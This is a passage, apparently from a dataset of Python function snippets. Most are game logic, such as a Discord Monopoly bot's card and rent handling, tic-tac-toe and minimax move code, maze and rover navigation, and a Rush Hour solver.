${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 4:\n\t\t\t\t\tself.goojf[self.p] += 1\n\t\t\t\t\tif self.goojf[self.p] == 1:\n\t\t\t\t\t\tmsg += 'You now have 1 get out of jail free card.\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg += f'You now have {self.goojf[self.p]} get out of jail free cards.\\n'\n\t\t\t\telif card == 5:\n\t\t\t\t\tself.tile[self.p] = 10\n\t\t\t\t\tself.injail[self.p] = True\n\t\t\t\t\tself.was_doubles = False\n\t\t\t\telif card == 6:\n\t\t\t\t\tself.bal[self.p] += 50 * (self.numalive - 1)\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\tfor i in range(self.num):\n\t\t\t\t\t\tif self.isalive[i] and not i == self.p:\n\t\t\t\t\t\t\tmem = await self.get_member(self.uid[i])\n\t\t\t\t\t\t\tself.bal[i] -= 50\n\t\t\t\t\t\t\tmsg += f'{mem.display_name} now has ${self.bal[i]}.\\n'\n\t\t\t\telif card in (7, 10, 16):\n\t\t\t\t\tself.bal[self.p] += 100\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 8:\n\t\t\t\t\tself.bal[self.p] += 20\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card in (9, 15):\n\t\t\t\t\tself.bal[self.p] += 10\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 11:\n\t\t\t\t\tself.bal[self.p] -= 100\n\t\t\t\t\tself.freeparkingsum += 100\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 12:\n\t\t\t\t\tself.bal[self.p] -= 150\n\t\t\t\t\tself.freeparkingsum += 150\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 13:\n\t\t\t\t\tself.bal[self.p] += 25\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 14:\n\t\t\t\t\tpay = 0\n\t\t\t\t\tfor i in range(40):\n\t\t\t\t\t\tif self.ownedby[i] == self.p:\n\t\t\t\t\t\t\tif self.numhouse[i] == 0 or self.numhouse[i] == -1:\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\telif self.numhouse[i] == 5:\n\t\t\t\t\t\t\t\tpay += 115\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tpay += 40 * self.numhouse[i]\n\t\t\t\t\tself.bal[self.p] -= pay\n\t\t\t\t\tmsg += f'You paid ${pay} in repairs. 
You now have ${self.bal[self.p]}.\\n'\n\t\t\t\tself.ccn += 1\n\t\t\t\tif self.ccn > 16:\n\t\t\t\t\tshuffle(self.ccorder)\n\t\t\t\t\tself.ccn = 0\n\t\t\telif self.tile[self.p] in (7, 22, 36): #chance\n\t\t\t\tcard = self.chanceorder[self.chancen]\n\t\t\t\tmsg += f'Your card reads:\\n{CHANCENAME[card]}\\n'\n\t\t\t\tif card == 0:\n\t\t\t\t\tself.tile[self.p] = 0\n\t\t\t\t\tdoDoubleGo = await self.cog.config.guild(self.ctx.guild).doDoubleGo()\n\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\tif doDoubleGo:\n\t\t\t\t\t\tself.bal[self.p] += goValue * 2\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 1:\n\t\t\t\t\tif self.tile[self.p] > 24:\n\t\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\t\tmsg += f'You passed go, you now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\tself.tile[self.p] = 24\n\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 2:\n\t\t\t\t\tif self.tile[self.p] > 11:\n\t\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\t\tmsg += f'You passed go, you now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\tself.tile[self.p] = 11\n\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 3:\n\t\t\t\t\tif self.tile[self.p] <= 12:\n\t\t\t\t\t\tself.tile[self.p] = 12\n\t\t\t\t\telif 12 < self.tile[self.p] <= 28:\n\t\t\t\t\t\tself.tile[self.p] = 28\n\t\t\t\t\telse:\n\t\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\t\tmsg += f'You passed go, you now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\t\tself.tile[self.p] = 12\n\t\t\t\t\t#must pay 10x rent if owned\n\t\t\t\t\tif (\n\t\t\t\t\t\tself.ownedby[self.tile[self.p]] != self.p\n\t\t\t\t\t\tand self.ownedby[self.tile[self.p]] >= 0\n\t\t\t\t\t\tand self.ismortgaged[self.tile[self.p]] != 1\n\t\t\t\t\t):\n\t\t\t\t\t\tmemown = await self.get_member(\n\t\t\t\t\t\t\tself.uid[self.ownedby[self.tile[self.p]]]\n\t\t\t\t\t\t)\n\t\t\t\t\t\tself.bal[self.p] -= distance * 10\n\t\t\t\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += distance * 10\n\t\t\t\t\t\tmsg += (\n\t\t\t\t\t\t\tf'You paid ${distance * 10} of rent to {memown.display_name}. '\n\t\t\t\t\t\t\tf'You now have ${self.bal[self.p]}. 
{memown.display_name} now has '\n\t\t\t\t\t\t\tf'${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t\t\t\t)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 4:\n\t\t\t\t\tif self.tile[self.p] <= 5:\n\t\t\t\t\t\tself.tile[self.p] = 5\n\t\t\t\t\telif self.tile[self.p] <= 15:\n\t\t\t\t\t\tself.tile[self.p] = 15\n\t\t\t\t\telif self.tile[self.p] <= 25:\n\t\t\t\t\t\tself.tile[self.p] = 25\n\t\t\t\t\telif self.tile[self.p] <= 35:\n\t\t\t\t\t\tself.tile[self.p] = 35\n\t\t\t\t\telse:\n\t\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\t\tmsg += f'You passed go, you now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\t\tself.tile[self.p] = 5\n\t\t\t\t\t#must pay 2x rent if owned\n\t\t\t\t\tif (\n\t\t\t\t\t\tself.ownedby[self.tile[self.p]] != self.p\n\t\t\t\t\t\tand self.ownedby[self.tile[self.p]] >= 0\n\t\t\t\t\t\tand self.ismortgaged[self.tile[self.p]] != 1\n\t\t\t\t\t):\n\t\t\t\t\t\tmemown = await self.get_member(\n\t\t\t\t\t\t\tself.uid[self.ownedby[self.tile[self.p]]]\n\t\t\t\t\t\t)\n\t\t\t\t\t\trrcount = 0\n\t\t\t\t\t\tif self.ownedby[5] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\t\t\trrcount += 1\n\t\t\t\t\t\tif self.ownedby[15] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\t\t\trrcount += 1\n\t\t\t\t\t\tif self.ownedby[25] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\t\t\trrcount += 1\n\t\t\t\t\t\tif self.ownedby[35] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\t\t\trrcount += 1\n\t\t\t\t\t\tself.bal[self.p] -= RRPRICE[rrcount] * 2\n\t\t\t\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += RRPRICE[rrcount] * 2\n\t\t\t\t\t\tmsg += (\n\t\t\t\t\t\t\tf'You paid ${RRPRICE[rrcount] * 2} of rent to {memown.display_name}. '\n\t\t\t\t\t\t\tf'You now have ${self.bal[self.p]}. {memown.display_name} now has '\n\t\t\t\t\t\t\tf'${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t\t\t\t)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 5:\n\t\t\t\t\tself.bal[self.p] += 50\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 6:\n\t\t\t\t\tself.goojf[self.p] += 1\n\t\t\t\t\tif self.goojf[self.p] == 1:\n\t\t\t\t\t\tmsg += 'You now have 1 get out of jail free card.\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg += f'You now have {self.goojf[self.p]} get out of jail free cards.\\n'\n\t\t\t\telif card == 7:\n\t\t\t\t\tself.tile[self.p] -= 3\n\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 8:\n\t\t\t\t\tself.tile[self.p] = 10\n\t\t\t\t\tself.injail[self.p] = True\n\t\t\t\t\tself.was_doubles = False\n\t\t\t\telif card == 9:\n\t\t\t\t\tpay = 0\n\t\t\t\t\tfor i in range(40):\n\t\t\t\t\t\tif self.ownedby[i] == self.p:\n\t\t\t\t\t\t\tif self.numhouse[i] == 0 or self.numhouse[i] == -1:\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\telif self.numhouse[i] == 5:\n\t\t\t\t\t\t\t\tpay += 100\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tpay += 25 * self.numhouse[i]\n\t\t\t\t\tself.bal[self.p] -= pay\n\t\t\t\t\tmsg += f'You paid ${pay} in repairs. 
You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 10:\n\t\t\t\t\tself.bal[self.p] -= 15\n\t\t\t\t\tself.freeparkingsum += 15\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 11:\n\t\t\t\t\tif self.tile[self.p] > 5:\n\t\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\t\tmsg += f'You passed go, you now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\tself.tile[self.p] = 5\n\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 12:\n\t\t\t\t\tself.tile[self.p] = 39\n\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 13:\n\t\t\t\t\tself.bal[self.p] -= 50 * (self.numalive - 1)\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\tfor i in range(self.num):\n\t\t\t\t\t\tif self.isalive[i] and not i == self.p:\n\t\t\t\t\t\t\tmem = await self.get_member(self.uid[i])\n\t\t\t\t\t\t\tself.bal[i] += 50\n\t\t\t\t\t\t\tmsg += f'{mem.display_name} now has ${self.bal[i]}.\\n'\n\t\t\t\telif card == 14:\n\t\t\t\t\tself.bal[self.p] += 150\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 15:\n\t\t\t\t\tself.bal[self.p] += 100\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\tself.chancen += 1\n\t\t\t\tif self.chancen > 15:\n\t\t\t\t\tshuffle(self.chanceorder)\n\t\t\t\t\tself.chancen = 0\n\t\t\telif self.tile[self.p] == 4: #income tax\n\t\t\t\tincomeValue = await self.cog.config.guild(self.ctx.guild).incomeValue()\n\t\t\t\tself.bal[self.p] -= incomeValue\n\t\t\t\tself.freeparkingsum += incomeValue\n\t\t\t\tmsg += (\n\t\t\t\t\tf'You paid ${incomeValue} of Income Tax. You now have ${self.bal[self.p]}.\\n'\n\t\t\t\t)\n\t\t\telif self.tile[self.p] == 38: #luxury tax\n\t\t\t\tluxuryValue = await self.cog.config.guild(self.ctx.guild).luxuryValue()\n\t\t\t\tself.bal[self.p] -= luxuryValue\n\t\t\t\tself.freeparkingsum += luxuryValue\n\t\t\t\tmsg += (\n\t\t\t\t\tf'You paid ${luxuryValue} of Luxury Tax. You now have ${self.bal[self.p]}.\\n'\n\t\t\t\t)\n\t\telif self.ownedby[self.tile[self.p]] == -1: #unowned and ownable\n\t\t\tif self.bal[self.p] >= PRICEBUY[self.tile[self.p]]: #can afford\n\t\t\t\tmsg += (\n\t\t\t\t\tf'Would you like to buy {TILENAME[self.tile[self.p]]} '\n\t\t\t\t\tf'for ${PRICEBUY[self.tile[self.p]]}? 
(y/n) You have ${self.bal[self.p]}.'\n\t\t\t\t)\n\t\t\t\tawait self.ctx.send(file=discord.File(self.bprint()))\n\t\t\t\tawait self.ctx.send(msg)\n\t\t\t\tchoice = await self.bot.wait_for(\n\t\t\t\t\t'message',\n\t\t\t\t\ttimeout=await self.cog.config.guild(self.ctx.guild).timeoutValue(),\n\t\t\t\t\tcheck=lambda m: (\n\t\t\t\t\t\tm.author.id == self.uid[self.p]\n\t\t\t\t\t\tand m.channel == self.ctx.channel\n\t\t\t\t\t\tand m.content.lower() in ('y', 'yes', 'n', 'no')\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t\tchoice = choice.content[0].lower()\n\t\t\t\tif choice == 'y': #buy property\n\t\t\t\t\tself.bal[self.p] -= PRICEBUY[self.tile[self.p]]\n\t\t\t\t\tself.ownedby[self.tile[self.p]] = self.p\n\t\t\t\t\tmsg = (\n\t\t\t\t\t\tf'You now own {TILENAME[self.tile[self.p]]}!\\n'\n\t\t\t\t\t\tf'You have ${self.bal[self.p]} remaining.\\n'\n\t\t\t\t\t)\n\t\t\t\telse: #pass on property\n\t\t\t\t\tmsg = ''\n\t\t\t\t\tdoAuction = await self.cog.config.guild(self.ctx.guild).doAuction()\n\t\t\t\t\tif doAuction:\n\t\t\t\t\t\tmsg = await self.auction(msg)\n\t\t\telse: #cannot afford\n\t\t\t\tmsg += (\n\t\t\t\t\tf'You cannot afford to buy {TILENAME[self.tile[self.p]]}, '\n\t\t\t\t\tf'you only have ${self.bal[self.p]} of ${PRICEBUY[self.tile[self.p]]}.\\n'\n\t\t\t\t)\n\t\t\t\tdoAuction = await self.cog.config.guild(self.ctx.guild).doAuction()\n\t\t\t\tif doAuction:\n\t\t\t\t\tmsg = await self.auction(msg)\n\t\telif RENTPRICE[self.tile[self.p]*6] == -1: #pay rr/util rent\n\t\t\tmemown = await self.get_member(self.uid[self.ownedby[self.tile[self.p]]])\n\t\t\tif self.tile[self.p] in (12, 28): #utility\n\t\t\t\tif self.ownedby[12] == self.ownedby[28]: #own both\n\t\t\t\t\tself.bal[self.p] -= distance * 10\n\t\t\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += distance * 10\n\t\t\t\t\tmsg += (\n\t\t\t\t\t\tf'You paid ${distance * 10} of rent to {memown.display_name}. '\n\t\t\t\t\t\tf'You now have ${self.bal[self.p]}. {memown.display_name} now has '\n\t\t\t\t\t\tf'${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t\t\t)\n\t\t\t\telse: #own only one\n\t\t\t\t\tself.bal[self.p] -= distance * 4\n\t\t\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += distance * 4\n\t\t\t\t\tmsg += (\n\t\t\t\t\t\tf'You paid ${distance * 4} of rent to {memown.display_name}. '\n\t\t\t\t\t\tf'You now have ${self.bal[self.p]}. {memown.display_name} now has '\n\t\t\t\t\t\tf'${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t\t\t) \n\t\t\telif self.tile[self.p] in (5, 15, 25, 35): #railroad\n\t\t\t\trrcount = 0\n\t\t\t\tif self.ownedby[5] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\trrcount += 1\n\t\t\t\tif self.ownedby[15] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\trrcount += 1\n\t\t\t\tif self.ownedby[25] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\trrcount += 1\n\t\t\t\tif self.ownedby[35] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\trrcount += 1\n\t\t\t\tself.bal[self.p] -= RRPRICE[rrcount]\n\t\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += RRPRICE[rrcount]\n\t\t\t\tmsg += (\n\t\t\t\t\tf'You paid ${RRPRICE[rrcount]} of rent to {memown.display_name}. '\n\t\t\t\t\tf'You now have ${self.bal[self.p]}. 
{memown.display_name} now has '\n\t\t\t\t\tf'${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t\t)\n\t\telse: #pay normal rent\n\t\t\tmemown = await self.get_member(self.uid[self.ownedby[self.tile[self.p]]])\n\t\t\tisMonopoly = False\n\t\t\tfor group in PROPGROUPS:\n\t\t\t\tif self.tile[self.p] in group:\n\t\t\t\t\tif all(\n\t\t\t\t\t\t[self.ownedby[self.tile[self.p]] == self.ownedby[prop] for prop in group]\n\t\t\t\t\t):\n\t\t\t\t\t\tisMonopoly = True\n\t\t\t\t\tbreak\n\t\t\tif isMonopoly and self.numhouse[self.tile[self.p]] == 0: #2x rent\n\t\t\t\trent = 2 * RENTPRICE[self.tile[self.p] * 6]\n\t\t\telse: #normal rent\n\t\t\t\trent = RENTPRICE[(self.tile[self.p] * 6) + self.numhouse[self.tile[self.p]]]\n\t\t\tself.bal[self.p] -= rent\n\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += rent\n\t\t\tmsg += (\n\t\t\t\tf'You paid ${rent} of rent to {memown.display_name}. '\n\t\t\t\tf'You now have ${self.bal[self.p]}. '\n\t\t\t\tf'{memown.display_name} now has ${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t)\n\t\tif self.bal[self.p] < 0:\n\t\t\tmsg = await self.debt(msg)\n\t\treturn msg", "def repairWall(self, game_state):\n first_row = [[0, 13], [1, 13],[2, 13],[3, 13],[4, 13],[5, 13],[6, 13],[7, 13],[8, 13],[9, 13],[10, 13],[11, 13],[12, 13],[13, 13],[15, 13],[16, 13],[17, 13],[18, 13],[19, 13],[20, 13],[21, 13],[22, 13],[23, 13],[24, 13],[25, 13],[26, 13],[27, 13]]\n destructor_loc1 = [[12,11], [16,11]]\n second_row = [[13, 12],[15, 12],[12, 12],[16, 12],[11, 12],[17, 12],[1, 12],[2, 12],[3, 12],[4, 12],[5, 12],[6, 12],[7, 12],[8, 12],[9, 12],[10, 12],[18, 12],[19, 12],[20, 12],[21, 12],[22, 12],[23, 12],[24, 12],[25, 12],[26, 12]]\n destructor_loc2 = [[8,11], [20,11]]\n encryptor_loc1 = [[13,11], [15,11]]\n destructor_loc3 = [[4,11], [24,11]]\n encryptor_row1 = [[13,10], [15,10]]\n destructor_row1 = [[12,10], [16,10]]\n encryptor_row2 = [[13,9], [15,9]]\n destructor_row2 = [[12,9], [16,9]]\n encryptor_row3 = [[13,8], [15,8]]\n destructor_row3 = [[12,8], [16,8]]\n\n for location in first_row:\n if game_state.can_spawn(FILTER, location):\n game_state.attempt_spawn(FILTER, location)\n\n for location in destructor_loc1:\n if game_state.can_spawn(DESTRUCTOR, location):\n game_state.attempt_spawn(DESTRUCTOR, location)\n\n for location in second_row:\n if game_state.can_spawn(FILTER, location):\n game_state.attempt_spawn(FILTER, location)\n\n for location in destructor_loc2:\n if game_state.can_spawn(DESTRUCTOR, location):\n game_state.attempt_spawn(DESTRUCTOR, location)\n\n for location in encryptor_loc1:\n if game_state.can_spawn(ENCRYPTOR, location):\n game_state.attempt_spawn(ENCRYPTOR, location)\n\n for location in destructor_loc3:\n if game_state.can_spawn(DESTRUCTOR, location):\n game_state.attempt_spawn(DESTRUCTOR, location)\n\n for location in encryptor_row1:\n if game_state.can_spawn(ENCRYPTOR, location):\n game_state.attempt_spawn(ENCRYPTOR, location)\n\n for location in destructor_row1:\n if game_state.can_spawn(DESTRUCTOR, location):\n game_state.attempt_spawn(DESTRUCTOR, location)\n\n for location in encryptor_row2:\n if game_state.can_spawn(ENCRYPTOR, location):\n game_state.attempt_spawn(ENCRYPTOR, location)\n\n for location in destructor_row2:\n if game_state.can_spawn(DESTRUCTOR, location):\n game_state.attempt_spawn(DESTRUCTOR, location)\n\n for location in encryptor_row3:\n if game_state.can_spawn(ENCRYPTOR, location):\n game_state.attempt_spawn(ENCRYPTOR, location)\n\n for location in destructor_row3:\n if game_state.can_spawn(DESTRUCTOR, location):\n 
game_state.attempt_spawn(DESTRUCTOR, location)", "def rop():\n return", "def make_move(self):\n\n # If the agent is starting a game, make an \n # initial move\n if self.get_play_status() == False: \n self.initial_move()\n return\n\n # for speeds sake, allow the reflex agent to respond to manual\n # input. comment out for automatic running.\n x = int(input('hotwire x:'))\n y = int(input('hotwire y:'))\n return self.get_game_space().set_tile(x,y,self.get_affinity())\n\n # Check wheather the the agent side is going to \n # win by making one move, make the move\n # OR\n # Check if the oponent has a compromising move \n best_move = self.victory_check()\n if best_move is None: best_move = self.counter_opponent_win()\n if best_move is None: best_move = self.counter_opponent_adv()\n if best_move is None: best_move = self.best_last_option()\n if best_move != None: \n x = best_move[0]\n y = best_move[1]\n return self.get_game_space().set_tile(x,y,self.get_affinity())", "def new_move(self, grid_x, grid_y, player):\n #duplication /!\\\n if player == self.X:\n self.draw_X(grid_x, grid_y)\n self.board[grid_y][grid_x] = self.X\n\n elif player == self.O:\n self.draw_O(grid_x, grid_y)\n self.board[grid_y][grid_x] = self.O", "def place_pillar_a(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__pillar_a = x, y\r\n if self.pillar_a_room() == self.pillar_e_room() or \\\r\n self.pillar_a_room() == self.pillar_i_room() or \\\r\n self.pillar_a_room() == self.pillar_p_room() or \\\r\n self.pillar_a_room() == self.entrance_room() or \\\r\n self.pillar_a_room() == self.exit_room():\r\n return self.place_pillar_a()\r\n self.__maze[x][y].set_pillar_a(True)", "def navigate_rover(self, name, instruction_str):\n\n rover = self.rovers.get(name)\n if not rover:\n raise RoverException(ExceptionMessages.BAD_NAME)\n\n coordinate = copy.deepcopy(rover.coordinate)\n direction = rover.direction\n\n for instruction in instruction_str:\n\n if instruction == 'L' or instruction == 'R':\n direction = self._direction_after_turning(direction, instruction)\n elif instruction == 'M':\n coordinate = self._coordinate_after_moving(direction, coordinate)\n else:\n raise RoverException(ExceptionMessages.INVALID_INSTRUCTION)\n\n # This means we have processed all the instructions without exception\n # assign new direction and coordinates to rover\n rover.direction = direction\n rover.coordinate = coordinate", "def make_move(self, row, column):\n\t\tif self.board[int(row)][int(column)] == '-':\n\t\t\tself.board[int(row)][int(column)] = self.marker\n\t\telse:\n\t\t\tprint(\"That spot is occupied, you messed up, you lose your turn for doing bad things\")", "def calculate_next_move(self, visit):\n self.depth += 1\n new_boards = []\n for vehicle_id in range(len(self.vehicles)):\n vehicle = self.vehicles[vehicle_id]\n state = self.get_board()\n if vehicle.orientation == 0: #horizontal\n if vehicle.x > 0: #left\n if state[vehicle.y][vehicle.x-1] == \"..\":\n self.vehicles[vehicle_id].x -=1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].x += 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].x += 1\n\n if vehicle.x + vehicle.length <= (len(state)-1): #right\n if state[vehicle.y][vehicle.x+vehicle.length] == \"..\":\n self.vehicles[vehicle_id].x += 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = 
deepcopy(self)\n self.vehicles[vehicle_id].x -= 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].x -= 1\n\n else: #vertical\n if vehicle.y - 1 >= 0: #up\n if state[vehicle.y-1][vehicle.x] == \"..\":\n self.vehicles[vehicle_id].y -= 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].y += 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].y += 1\n\n if vehicle.y + vehicle.length <= (len(state)-1):\n if state[vehicle.y + vehicle.length][vehicle.x] == \"..\":#down\n self.vehicles[vehicle_id].y += 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].y -= 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].y -= 1\n self.depth -= 1\n return new_boards", "def move_repeatedly():\n check = check50.run(run_command)\n check.stdin(\"WEST\").stdout(room_2_description)\n check.stdin(\"EAST\").stdout(room_1_name)\n check.stdin(\"WEST\").stdout(room_2_name)", "def move_marble(self, coordinates, direction):\n pass", "def move(self):\n # neighbor offsets\n offset = [(-1, 1),(0, 1),(1, 1),(-1, 0),(1, 0),(-1, -1),(0, -1),(1, -1)]\n for i in range(len(offset)):\n x = self.x + offset[i][0] # neighboring coordinates\n y = self.y + offset[i][1]\n if self.island.animal(x, y) == 0: # neighboring spot is open\n self.island.remove(self) # remove from current spot\n self.x = x # new coordinates\n self.y = y\n self.island.register(self) # register new coordinates\n break # finished with move", "def move_buildings(self):", "def make_move(self):\n\n # get relavent information\n affinity = self.get_affinity()\n sample_space = self.get_game_space()\n depth_limit = self.__search_depth\n\n # run a minimax search and get the best value\n bestval = MinimaxTree.alphabeta(self, sample_space, affinity, depth_limit, -10000, 10001, True)\n if bestval[0] is None: bestval = ((0,6),'x', 0)\n\n # print the number of nodes expanded \n print(self.nodes_expanded)\n\n # make the move found by the search \n self.get_game_space().set_tile(bestval[0][0], bestval[0][1], affinity)", "def carve_path(self):\n final = self.length # once we reach the last length, we set the goal and terminate\n w, l, h = 0, 0, 0 # start at 0,0,0\n last_move_name, last_move_tuple = \"forward\", (0, 1, 0) # we don't want to repeat the last movement\n moves = {\"back\": (0, -1, 0), \"left\": (-1, 0, 0), \"right\": (1, 0, 0), \"up\": (0, 0, 1),\n \"down\": (0, 0, -1)} # possible moves\n self.world_grid[w][l][h] = blocks[\"empty\"] # set the current block empty\n while l != final:\n move, (m_w, m_l, m_h) = random.choice(list(moves.iteritems())) # get a move\n w += m_w # apply move\n l += m_l\n h += m_h\n self.world_grid[w][l][h] = blocks[\"empty\"] # set that cell empty\n moves[last_move_name] = last_move_tuple # add back in the last move to movelist\n last_move_name, 
last_move_tuple = move, (m_w, m_l, m_h) # copy the current move to last move\n moves.pop(last_move_name) # remove the current\n self.goal = (w, l, h) # after terminating, set this as the goal", "def move(self, direction):\n # replace with your code\n\n indices = self.direction_indices[direction]\n for coordinate in indices:\n merged_coordinate_list = self.get_list(direction, coordinate)\n self.change_board(merged_coordinate_list, coordinate, direction)\n print(self.__str__())\n if self.board_is_not_full():\n self.new_tile()", "def breaking_of_the_box(size = (10, 10), verbose = False):\n import numpy as np\n r, l, u, d = \"R\", \"L\", \"U\", \"D\" # initiating walkind directions\n np.random.seed(int(time.time()))\n \n # initiating field with walking directions\n field = np.random.randint(1, 5, size = (10, 10))\n field = np.where(field ==1, r, field)\n field = np.where(field =='2', l, field)\n field = np.where(field =='3', u, field)\n field = np.where(field =='4', d, field)\n\n i, j = 0, 0\n coordinates = []\n \n # iterating in a field\n while (i<field.shape[0] and i>-1) and (j<field.shape[1] and j>-1):\n prev_i,prev_j = i, j\n coordinates.append((i, j)) \n \n copy_field = field.copy()\n \n if field[i][j] == r:\n j+=1\n elif field[i][j] == l:\n j-=1\n elif field[i][j] == u:\n i-=1\n elif field[i][j] == d:\n i+=1\n copy_field[i][j] = \"X\"\n if verbose == True:\n print(copy_field, \"#\"*48, sep = \"\\n\") #printing step by step position of a player\n if (i, j) in coordinates:\n # in case of infitine loop break\n print(\"Player is stucked inside of a box\")\n break\n\n else:\n print(\"Player came out of the box\")\n print(\"Coordinates of a breaking point\", \"(\", prev_i, prev_j, \")\")", "def move_robot(room, direction):\r\n\r\n robot_row, robot_col = robot_location(room)\r\n\r\n intended_row = robot_row\r\n intended_col = robot_col\r\n\r\n if direction == \"right\":\r\n intended_col = robot_col + 1\r\n elif direction == \"left\":\r\n intended_col = robot_col - 1\r\n elif direction == \"up\":\r\n intended_row = robot_row - 1\r\n elif direction == \"down\":\r\n intended_row = robot_row + 1\r\n\r\n if room[intended_row][intended_col] != \"obstacle\":\r\n room[intended_row][intended_col] = \"robot\"\r\n room[robot_row][robot_col] = \"empty\"\r\n\r\n return room", "def add_river_greedy(me, lm, material_dict, imgs, rounded_river,\n min_length):\n print(\" Building random river...\")\n cell_source = get_river_source(material_dict)\n if not(cell_source):\n print(\"no cell source\")\n return\n xi,yi = cell_source\n cell_source = lm.cells[xi][yi]\n path = [cell_source]\n cell_xy = cell_source\n maxn = 1000\n it = 0\n should_finish = False\n margin = 0.01\n lake_probability = 0.5\n while True:\n if it > maxn:\n break\n elif \"water\" in cell_xy.material.name.lower():\n break\n elif should_finish:\n break\n it += 1\n section_length = random.randint(2,10)\n if random.random() < 0.5:\n sign = 1\n else:\n sign = -1\n if random.random() < 0.5:\n dx, dy = sign, 0\n else:\n dx, dy = 0, sign\n## print(dx,dy,section_length)\n ################################################\n for i in range(section_length):\n if should_finish:\n break\n x = cell_xy.coord[0] + dx\n y = cell_xy.coord[1] + dy\n new_cell = lm.get_cell_at(x,y)\n if new_cell is None:\n break\n elif new_cell.h - margin > cell_xy.h:\n if cell_xy.material.name != new_cell.material.name:\n break\n elif new_cell in path:\n break\n elif new_cell.name != \"river\":\n is_valid = True\n for neigh in 